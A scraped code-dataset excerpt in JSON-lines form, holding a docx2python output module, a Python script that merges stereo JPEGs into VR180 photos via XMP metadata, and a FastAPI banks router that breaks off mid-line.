"line_number": 54, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 54, "usage_type": "name"}, {"api_name": "modules.args.scale", "line_number": 55, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 55, "usage_type": "name"}, {"api_name": "modules.args.loss_type", "line_number": 58, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 58, "usage_type": "name"}, {"api_name": "modules.models.BertCls", "line_number": 59, "usage_type": "call"}, {"api_name": "modules.args.model_name_or_path", "line_number": 60, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 60, "usage_type": "name"}, {"api_name": "modules.models.TripletMarginLoss", "line_number": 62, "usage_type": "call"}, {"api_name": "modules.args.margin", "line_number": 63, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 63, "usage_type": "name"}, {"api_name": "modules.args.loss_type", "line_number": 67, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 67, "usage_type": "name"}, {"api_name": "modules.models.BertCls", "line_number": 68, "usage_type": "call"}, {"api_name": "modules.args.model_name_or_path", "line_number": 69, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 69, "usage_type": "name"}, {"api_name": "modules.models.MultiSimilarityLoss", "line_number": 71, "usage_type": "call"}, {"api_name": "modules.args.alpha", "line_number": 72, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 72, "usage_type": "name"}, {"api_name": "modules.args.beta", "line_number": 73, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 73, "usage_type": "name"}, {"api_name": "modules.args.base", "line_number": 74, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 74, "usage_type": "name"}, {"api_name": "modules.args.loss_type", "line_number": 77, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 77, "usage_type": "name"}, {"api_name": "modules.models.BertCls", "line_number": 78, "usage_type": "call"}, {"api_name": "modules.args.model_name_or_path", "line_number": 79, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 79, "usage_type": "name"}, {"api_name": "modules.models.NTXentLoss", "line_number": 81, "usage_type": "call"}, {"api_name": "modules.args.temperature", "line_number": 82, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 82, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 86, "usage_type": "call"}, {"api_name": "accelerate.Accelerator", "line_number": 92, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 94, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 97, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 103, "usage_type": "attribute"}, {"api_name": "logging.ERROR", "line_number": 103, "usage_type": "attribute"}, {"api_name": "datasets.utils.logging.set_verbosity_warning", "line_number": 105, "usage_type": "call"}, {"api_name": "datasets.utils", "line_number": 105, "usage_type": "attribute"}, {"api_name": "transformers.utils.logging.set_verbosity_info", "line_number": 106, "usage_type": "call"}, {"api_name": "transformers.utils", "line_number": 106, "usage_type": "attribute"}, {"api_name": "datasets.utils.logging.set_verbosity_error", "line_number": 108, "usage_type": "call"}, {"api_name": "datasets.utils", "line_number": 108, "usage_type": "attribute"}, {"api_name": "transformers.utils.logging.set_verbosity_error", "line_number": 109, "usage_type": "call"}, {"api_name": "transformers.utils", "line_number": 109, "usage_type": "attribute"}, {"api_name": "modules.args.seed", "line_number": 112, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 112, "usage_type": "name"}, {"api_name": "transformers.set_seed", "line_number": 113, "usage_type": "call"}, {"api_name": "modules.args.seed", "line_number": 113, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 113, "usage_type": "name"}, {"api_name": "modules.args.output_dir", "line_number": 117, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 117, "usage_type": "name"}, {"api_name": "os.makedirs", "line_number": 118, "usage_type": "call"}, {"api_name": "modules.args.output_dir", "line_number": 118, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 118, "usage_type": "name"}, {"api_name": "modules.args.train_file", "line_number": 123, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 123, "usage_type": "name"}, {"api_name": "modules.args.train_file", "line_number": 124, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 124, "usage_type": "name"}, {"api_name": "modules.args.validation_file", "line_number": 125, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 125, "usage_type": "name"}, {"api_name": "modules.args.validation_file", "line_number": 126, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 126, "usage_type": "name"}, {"api_name": "datasets.load_dataset", "line_number": 128, "usage_type": "call"}, {"api_name": "modules.args.label_num", "line_number": 132, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 132, "usage_type": "name"}, {"api_name": "modules.args.label_num", "line_number": 133, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 133, "usage_type": "name"}, {"api_name": "transformers.AutoTokenizer.from_pretrained", "line_number": 146, "usage_type": "call"}, {"api_name": "transformers.AutoTokenizer", "line_number": 146, "usage_type": "name"}, {"api_name": "modules.args.model_name_or_path", "line_number": 146, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 146, "usage_type": "name"}, {"api_name": "modules.args.use_slow_tokenizer", "line_number": 146, "usage_type": "attribute"}, {"api_name": "modules.args.pad_to_max_length", "line_number": 153, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 153, "usage_type": "name"}, {"api_name": "modules.args.max_length", "line_number": 160, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 160, "usage_type": "name"}, {"api_name": "random.sample", "line_number": 185, "usage_type": "call"}, {"api_name": "modules.args.pad_to_max_length", "line_number": 189, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 189, "usage_type": "name"}, {"api_name": "transformers.default_data_collator", "line_number": 192, "usage_type": "name"}, {"api_name": "transformers.DataCollatorWithPadding", "line_number": 197, "usage_type": "call"}, {"api_name": "modules.args.loss_type", "line_number": 200, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 200, "usage_type": "name"}, {"api_name": "modules.args", "line_number": 201, "usage_type": "argument"}, {"api_name": "modules.args", "line_number": 203, "usage_type": "argument"}, {"api_name": "modules.args.m_per_class_sampler", "line_number": 208, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 208, "usage_type": "name"}, {"api_name": "modules.samplers.MPerClassSampler", "line_number": 209, "usage_type": "call"}, {"api_name": "modules.args.sample_per_class_in_train_batch", "line_number": 211, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 211, "usage_type": "name"}, {"api_name": "modules.args.per_device_train_batch_size", "line_number": 212, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 212, "usage_type": "name"}, {"api_name": "modules.samplers.MPerClassSampler", "line_number": 215, "usage_type": "call"}, {"api_name": "modules.args.sample_per_class_in_eval_batch", "line_number": 217, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 217, "usage_type": "name"}, {"api_name": "modules.args.per_device_eval_batch_size", "line_number": 218, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 218, "usage_type": "name"}, {"api_name": "modules.args.m_per_class_sampler_without_easy_positives", "line_number": 221, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 221, "usage_type": "name"}, {"api_name": "modules.samplers.MPerClassSamplerWithoutEasyPostives", "line_number": 222, "usage_type": "call"}, {"api_name": "modules.args.sample_per_class_in_train_batch", "line_number": 225, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 225, "usage_type": "name"}, {"api_name": "modules.args.per_device_train_batch_size", "line_number": 226, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 226, "usage_type": "name"}, {"api_name": "modules.samplers.MPerClassSamplerWithoutEasyPostives", "line_number": 229, "usage_type": "call"}, {"api_name": "modules.args.sample_per_class_in_eval_batch", "line_number": 232, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 232, "usage_type": "name"}, {"api_name": "modules.args.per_device_eval_batch_size", "line_number": 233, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 233, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 236, "usage_type": "call"}, {"api_name": "modules.args.per_device_train_batch_size", "line_number": 241, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 241, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 244, "usage_type": "call"}, {"api_name": "modules.args.per_device_eval_batch_size", "line_number": 249, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 249, "usage_type": "name"}, {"api_name": "modules.args.weight_decay", "line_number": 259, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 259, "usage_type": "name"}, {"api_name": "transformers.AdamW", "line_number": 266, "usage_type": "call"}, {"api_name": "modules.args.learning_rate", "line_number": 266, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 266, "usage_type": "name"}, {"api_name": "math.ceil", "line_number": 277, "usage_type": "call"}, {"api_name": "modules.args.gradient_accumulation_steps", "line_number": 277, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 277, "usage_type": "name"}, {"api_name": "modules.args.max_train_steps", "line_number": 279, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 279, "usage_type": "name"}, {"api_name": "modules.args.num_train_epochs", "line_number": 279, "usage_type": "attribute"}, {"api_name": "transformers.get_scheduler", "line_number": 281, "usage_type": "call"}, {"api_name": "modules.args.lr_scheduler_type", "line_number": 282, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 282, "usage_type": "name"}, {"api_name": "modules.args.num_warmup_steps", "line_number": 284, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 284, "usage_type": "name"}, {"api_name": "modules.args.max_train_steps", "line_number": 285, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 285, "usage_type": "name"}, {"api_name": "modules.utils.AccuracyCalculator", "line_number": 288, "usage_type": "call"}, {"api_name": "modules.args.per_device_train_batch_size", "line_number": 291, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 291, "usage_type": "name"}, {"api_name": "modules.args.gradient_accumulation_steps", "line_number": 291, "usage_type": "attribute"}, {"api_name": "modules.args.num_train_epochs", "line_number": 295, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 295, "usage_type": "name"}, {"api_name": "modules.args.per_device_train_batch_size", "line_number": 296, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 296, "usage_type": "name"}, {"api_name": "modules.args.gradient_accumulation_steps", "line_number": 298, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 298, "usage_type": "name"}, {"api_name": "modules.args.max_train_steps", "line_number": 299, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 299, "usage_type": "name"}, {"api_name": "tqdm.auto.tqdm", "line_number": 307, "usage_type": "call"}, {"api_name": "torch.nn.functional.normalize", "line_number": 318, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 318, "usage_type": "name"}, {"api_name": "numpy.concatenate", "line_number": 322, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 323, "usage_type": "call"}, {"api_name": "tqdm.auto.tqdm", "line_number": 336, "usage_type": "call"}, {"api_name": "modules.args.max_train_steps", "line_number": 336, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 336, "usage_type": "name"}, {"api_name": "modules.args.num_train_epochs", "line_number": 339, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 339, "usage_type": "name"}, {"api_name": "modules.args.loss_type", "line_number": 351, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 351, "usage_type": "name"}, {"api_name": "modules.args.gradient_accumulation_steps", "line_number": 362, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 362, "usage_type": "name"}, {"api_name": "modules.args.gradient_accumulation_steps", "line_number": 365, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 365, "usage_type": "name"}, {"api_name": "modules.args.max_train_steps", "line_number": 372, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 372, "usage_type": "name"}, {"api_name": "modules.args.eval_steps", "line_number": 376, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 376, "usage_type": "name"}, {"api_name": "torch.nn.functional.normalize", "line_number": 386, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 386, "usage_type": "name"}, {"api_name": "numpy.concatenate", "line_number": 390, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 391, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 405, "usage_type": "call"}, {"api_name": "os.path", "line_number": 405, "usage_type": "attribute"}, {"api_name": "modules.args.output_dir", "line_number": 405, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 405, "usage_type": "name"}, {"api_name": "modules.args.eval_steps", "line_number": 410, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 410, "usage_type": "name"}, {"api_name": "torch.nn.functional.normalize", "line_number": 422, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 422, "usage_type": "name"}, {"api_name": "numpy.concatenate", "line_number": 426, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 427, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 441, "usage_type": "call"}, {"api_name": "os.path", "line_number": 441, "usage_type": "attribute"}, {"api_name": "modules.args.output_dir", "line_number": 441, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 441, "usage_type": "name"}, {"api_name": "modules.args.output_dir", "line_number": 446, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 446, "usage_type": "name"}, {"api_name": "modules.args.eval_steps", "line_number": 447, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 447, "usage_type": "name"}, {"api_name": "shutil.copyfile", "line_number": 448, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 449, "usage_type": "call"}, {"api_name": "os.path", "line_number": 449, "usage_type": "attribute"}, {"api_name": "modules.args.output_dir", "line_number": 449, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 449, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 450, "usage_type": "call"}, {"api_name": "os.path", "line_number": 450, "usage_type": "attribute"}, {"api_name": "modules.args.output_dir", "line_number": 450, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 450, "usage_type": "name"}, {"api_name": "modules.args.max_train_steps", "line_number": 455, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 455, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 456, "usage_type": "call"}, {"api_name": "os.path", "line_number": 456, "usage_type": "attribute"}, {"api_name": "modules.args.output_dir", "line_number": 456, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 456, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 457, "usage_type": "call"}, {"api_name": "os.path", "line_number": 457, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 458, "usage_type": "call"}, {"api_name": "shutil.copyfile", "line_number": 461, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 462, "usage_type": "call"}, {"api_name": "os.path", "line_number": 462, "usage_type": "attribute"}, {"api_name": "modules.args.output_dir", "line_number": 462, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 462, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 463, "usage_type": "call"}, {"api_name": "os.path", "line_number": 463, "usage_type": "attribute"}, {"api_name": "modules.args.output_dir", "line_number": 463, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 463, "usage_type": "name"}, {"api_name": "modules.args.num_train_epochs", "line_number": 468, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 468, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 469, "usage_type": "call"}, {"api_name": "os.path", "line_number": 469, "usage_type": "attribute"}, {"api_name": "modules.args.output_dir", "line_number": 469, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 469, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 470, "usage_type": "call"}, {"api_name": "os.path", "line_number": 470, "usage_type": "attribute"}, {"api_name": "os.remove", "line_number": 471, "usage_type": "call"}, {"api_name": "modules.args.output_dir", "line_number": 474, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 474, "usage_type": "name"}, {"api_name": "modules.args.output_dir", "line_number": 475, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 475, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 477, "usage_type": "call"}, {"api_name": "os.path", "line_number": 477, "usage_type": "attribute"}, {"api_name": "modules.args.output_dir", "line_number": 477, "usage_type": "attribute"}, {"api_name": "modules.args", "line_number": 477, "usage_type": "name"}, {"api_name": "modules.args", "line_number": 482, "usage_type": "name"}, {"api_name": "modules.args.parse_args", "line_number": 482, "usage_type": "call"}, {"api_name": "modules.args", "line_number": 483, "usage_type": "argument"}]}
+{"seq_id": "31144676018", "text": "#!/usr/bin/env python3\n# _*_ coding: utf-8 _*_\n\"\"\"Output format for extracted docx content.\n\n:author: Shay Hill\n:created: 7/5/2019\n\nHolds runs in a 5-deep nested list (paragraphs are lists of text runs [strings])::\n\n [ # tables\n [ # table\n [ # row\n [ # cell\n [ # paragraph\n \"run 1 \", # text run\n \"run 2 \", # text run\n \"run 3\" # text run\n ]\n ]\n ]\n ]\n ]\n\n_runs properties (e.g., ``header_runs``) return text in this format.\n\nAlso returns a 4-deep nested list (paragraphs are strings)::\n\n [ # tables\n [ # table\n [ # row\n [ # cell\n \"run 1 run 2 run 3\" # paragraph\n ]\n ]\n ]\n ]\n\nThis is the format for default (no trailing \"_runs\", e.g ``header``) properties.\n\n\"\"\"\nfrom copy import deepcopy\nfrom dataclasses import dataclass\nfrom typing import Any, Dict, Optional\nfrom warnings import warn\n\nfrom .docx_context import collect_docProps\nfrom .docx_reader import DocxReader\nfrom .docx_text import TablesList\nfrom .iterators import enum_at_depth, get_html_map, iter_at_depth\n\n\n@dataclass\nclass DocxContent:\n \"\"\"Holds return values for docx content.\"\"\"\n\n docx_reader: DocxReader\n docx2python_kwargs: Dict[str, Any]\n\n def __getattr__(self, item) -> Any:\n \"\"\"\n Create depth-four paragraph tables form depth-five run tables.\n\n :param item:\n :return:\n\n Docx2Python v1 joined runs into paragraphs earlier in the code. Docx2Python v2\n exposes runs to the user, but still returns paragraphs by default.\n \"\"\"\n if item in {\"header\", \"footer\", \"body\", \"footnotes\", \"endnotes\"}:\n runs = deepcopy(getattr(self, item + \"_runs\"))\n for (i, j, k, l), paragraph in enum_at_depth(runs, 4):\n runs[i][j][k][l] = \"\".join(paragraph)\n return runs\n raise AttributeError(f\"no attribute {item}\")\n\n def _get_runs(self, type_: str) -> TablesList:\n content = []\n for file in self.docx_reader.files_of_type(type_):\n content += file.content\n return content\n\n @property\n def header_runs(self) -> TablesList:\n return self._get_runs(\"header\")\n\n @property\n def footer_runs(self) -> TablesList:\n return self._get_runs(\"footer\")\n\n @property\n def officeDocument_runs(self) -> TablesList:\n return self._get_runs(\"officeDocument\")\n\n @property\n def body_runs(self) -> TablesList:\n return self.officeDocument_runs\n\n @property\n def footnotes_runs(self) -> TablesList:\n return self._get_runs(\"footnotes\")\n\n @property\n def endnotes_runs(self) -> TablesList:\n return self._get_runs(\"endnotes\")\n\n @property\n def images(self) -> Dict[str, bytes]:\n return self.docx_reader.pull_image_files(\n self.docx2python_kwargs[\"image_folder\"]\n )\n\n @property\n def document(self) -> TablesList:\n \"\"\"All docx \"tables\" concatenated.\"\"\"\n return self.header + self.body + self.footer + self.footnotes + self.endnotes\n\n @property\n def document_runs(self) -> TablesList:\n \"\"\"All docx x_runs properties concatenated.\"\"\"\n return (\n self.header_runs\n + self.body_runs\n + self.footer_runs\n + self.footnotes_runs\n + self.endnotes_runs\n )\n\n @property\n def text(self) -> str:\n \"\"\"All docx paragraphs, \"\\n\\n\" delimited.\"\"\"\n if self.docx2python_kwargs[\"paragraph_styles\"] is True:\n # Paragraph descriptors have been inserted as the first run of each\n # paragraph. Take them out.\n pars = [\"\".join(x[1:]) for x in iter_at_depth(self.document_runs, 4)]\n return \"\\n\\n\".join(pars)\n return \"\\n\\n\".join(iter_at_depth(self.document, 4))\n\n @property\n def html_map(self) -> str:\n \"\"\"A visual mapping of docx content.\"\"\"\n return get_html_map(self.document)\n\n @property\n def properties(self) -> Dict[str, Optional[str]]:\n \"\"\"Document core-properties as a dictionary.\n\n Docx files created with Google docs won't have core-properties. If the file\n `core-properties` is missing, return an empty dict.\n \"\"\"\n warn(\n \"DocxContent.properties is deprecated and will be removed in some future \"\n \"version. Use DocxContent.core_properties.\",\n FutureWarning,\n )\n return self.core_properties\n\n # noinspection PyPep8Naming\n @property\n def core_properties(self) -> Dict[str, Optional[str]]:\n \"\"\"Document core-properties as a dictionary.\n\n Docx files created with Google docs won't have core-properties. If the file\n `core-properties` is missing, return an empty dict.\n \"\"\"\n try:\n docProps = next(iter(self.docx_reader.files_of_type(\"core-properties\")))\n return collect_docProps(docProps.root_element)\n except StopIteration:\n warn(\n \"Could not find core-properties file (should be in docProps/core.xml) \"\n \"in DOCX, so returning an empty core_properties dictionary. Docx files \"\n \"created in Google Docs do not have a core-properties file, so this \"\n \"may be expected.\"\n )\n return {}\n\n def save_images(self, image_folder: str) -> Dict[str, bytes]:\n return self.docx_reader.pull_image_files(image_folder)\n", "repo_name": "Saransh-13/Test_sum", "sub_path": "venv/Lib/site-packages/docx2python/docx_output.py", "file_name": "docx_output.py", "file_ext": "py", "file_size_in_byte": 5595, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "docx_reader.DocxReader", "line_number": 56, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 57, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 57, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 70, "usage_type": "call"}, {"api_name": "iterators.enum_at_depth", "line_number": 71, "usage_type": "call"}, {"api_name": "typing.Any", "line_number": 59, "usage_type": "name"}, {"api_name": "docx_text.TablesList", "line_number": 76, "usage_type": "name"}, {"api_name": "docx_text.TablesList", "line_number": 83, "usage_type": "name"}, {"api_name": "docx_text.TablesList", "line_number": 87, "usage_type": "name"}, {"api_name": "docx_text.TablesList", "line_number": 91, "usage_type": "name"}, {"api_name": "docx_text.TablesList", "line_number": 95, "usage_type": "name"}, {"api_name": "docx_text.TablesList", "line_number": 99, "usage_type": "name"}, {"api_name": "docx_text.TablesList", "line_number": 103, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 107, "usage_type": "name"}, {"api_name": "docx_text.TablesList", "line_number": 113, "usage_type": "name"}, {"api_name": "docx_text.TablesList", "line_number": 118, "usage_type": "name"}, {"api_name": "iterators.iter_at_depth", "line_number": 134, "usage_type": "call"}, {"api_name": "iterators.iter_at_depth", "line_number": 136, "usage_type": "call"}, {"api_name": "iterators.get_html_map", "line_number": 141, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 150, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 144, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 144, "usage_type": "name"}, {"api_name": "docx_context.collect_docProps", "line_number": 167, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 169, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 159, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 159, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 177, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 52, "usage_type": "name"}]}
+{"seq_id": "10528575245", "text": "# -*- coding: utf-8 -*-\nimport sys\nimport os\nimport shutil\nimport base64\nfrom libxmp import XMPFiles, XMPMeta\n\n# Usage\nif len(sys.argv) < 5:\n print('[Usage]')\n print(' $ python {0} [Left image path] [Right image path] [Image width] [Image height]'.format(sys.argv[0]))\n print(' * The image type must be jpeg.')\n print(' * These images must be same width and height.')\n print(' * Output merged vr image file named {Left image file}.vr.jpg.')\n exit()\n\n# Arguments\nlimage_path = sys.argv[1]\nrimage_path = sys.argv[2]\nimage_width = int(sys.argv[3])\nimage_height = int(sys.argv[4])\nif not os.path.isfile(limage_path):\n print('Left image path ({0}) is not exists.'.format(limage_path))\n exit()\nif not os.path.isfile(rimage_path):\n print('Right image path ({0}) is not exists.'.format(rimage_path))\n exit()\n\n# Copy left image file\nlimage_dir = os.path.split(limage_path)[0]\nlimage_fname = os.path.splitext(os.path.split(limage_path)[1])[0]\nvrimage_path = os.path.join(limage_dir, limage_fname + '.vr.jpg')\nshutil.copyfile(limage_path, vrimage_path)\n\n# Load image's xmp\nvrimage_file = XMPFiles(file_path=vrimage_path, open_forupdate=True)\nlxmp = vrimage_file.get_xmp()\n#print(lxmp)\n\n# Google's namespace\nXMP_GIMAGE = 'http://ns.google.com/photos/1.0/image/'\nXMP_GPANO = 'http://ns.google.com/photos/1.0/panorama/'\nXMPMeta.register_namespace(XMP_GIMAGE, 'GImage')\nXMPMeta.register_namespace(XMP_GPANO, 'GPano')\n\n# Set GPano properties\nlxmp.set_property(XMP_GPANO, 'ProjectionType', 'equirectangular')\nlxmp.set_property_int(XMP_GPANO, 'CroppedAreaLeftPixels', image_width/2)\nlxmp.set_property_int(XMP_GPANO, 'CroppedAreaTopPixels', 0)\nlxmp.set_property_int(XMP_GPANO, 'CroppedAreaImageWidthPixels', image_width)\nlxmp.set_property_int(XMP_GPANO, 'CroppedAreaImageHeightPixels', image_height)\nlxmp.set_property_int(XMP_GPANO, 'FullPanoWidthPixels', image_width*2)\nlxmp.set_property_int(XMP_GPANO, 'FullPanoHeightPixels', image_height)\nlxmp.set_property_int(XMP_GPANO, 'InitialViewHeadingDegrees', 180)\n\n# Encode right image to BASE64\nrimage_data = open(rimage_path, 'rt').read()\nrimage_base64 = base64.b64encode(rimage_data)\n\n# Set GImage properties\nlxmp.set_property(XMP_GIMAGE, 'Mime', 'image/jpeg')\nlxmp.set_property(XMP_GIMAGE, 'Data', rimage_base64)\n\n# Put XMP.\nif vrimage_file.can_put_xmp(lxmp):\n vrimage_file.put_xmp(lxmp)\n print(vrimage_file.get_xmp())\n print(\"Done!\")\n\nvrimage_file.close_file()\n", "repo_name": "temoki/make_vr180photo_py", "sub_path": "make_vr180photo.py", "file_name": "make_vr180photo.py", "file_ext": "py", "file_size_in_byte": 2435, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.argv", "line_number": 9, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 11, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 18, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 19, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 20, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "shutil.copyfile", "line_number": 33, "usage_type": "call"}, {"api_name": "libxmp.XMPFiles", "line_number": 36, "usage_type": "call"}, {"api_name": "libxmp.XMPMeta.register_namespace", "line_number": 43, "usage_type": "call"}, {"api_name": "libxmp.XMPMeta", "line_number": 43, "usage_type": "name"}, {"api_name": "libxmp.XMPMeta.register_namespace", "line_number": 44, "usage_type": "call"}, {"api_name": "libxmp.XMPMeta", "line_number": 44, "usage_type": "name"}, {"api_name": "base64.b64encode", "line_number": 58, "usage_type": "call"}]}
+{"seq_id": "16776006048", "text": "from typing import List, Optional\n\nfrom fastapi import APIRouter, Depends, Query\nfrom fastapi.responses import JSONResponse\n\nfrom app.api.errors import BANK_NOT_FOUND\nfrom app.dependencies.services import get_bank_service\nfrom app.models.banks import Bank\nfrom app.models.currencies import Currency\nfrom app.services.banks import Banks\nfrom app.utils.exceptions import BankNotFound\nfrom loguru import logger\n\nrouter = APIRouter(tags=[\"banks\"], prefix=\"/banks\")\n\n\n@router.get(\n path=\"/all\",\n description=\"Метод получения списка всех банков\",\n response_model=List[Bank]\n)\nasync def get_banks(\n currency_id: Optional[int] = Query(default=None),\n banks_service: Banks = Depends(get_bank_service)\n):\n logger.info(\"Start method get_banks\")\n result = await banks_service.get_banks(currency_id)\n logger.info(\"Method get_banks return \" + result)\n logger.info(\"Finish method get_banks\")\n return result or JSONResponse({})\n\n\n@router.get(\n path=\"/{bank_id}\",\n description=\"Метод получения банка по id\",\n response_model=Bank\n)\nasync def get_bank_by_id(\n bank_id: int,\n bank_service: Banks = Depends(get_bank_service)\n):\n logger.info(\"Start method get_bank_by_id\")\n result = await bank_service.get_bank_by_id(bank_id)\n if result:\n logger.info(\"Method get_bank_by_id return \" + result)\n else:\n logger.error(f\"Method get_bank_by_id except {BANK_NOT_FOUND}\")\n return result or JSONResponse({\"error\": BANK_NOT_FOUND}, status_code=404)\n\n\n@router.get(\n path=\"/{bank_id}/currencies\",\n description=\"Метод дял получения валют банка\",\n response_model=List[Currency]\n)\nasync def get_bank_currencies(\n bank_id: int,\n bank_service: Banks = Depends(get_bank_service)\n):\n logger.info(\"Start method get_bank_currencies\")\n try:\n result = await bank_service.get_bank_currencies(bank_id)\n logger.info(\"Method get_bank_currencies 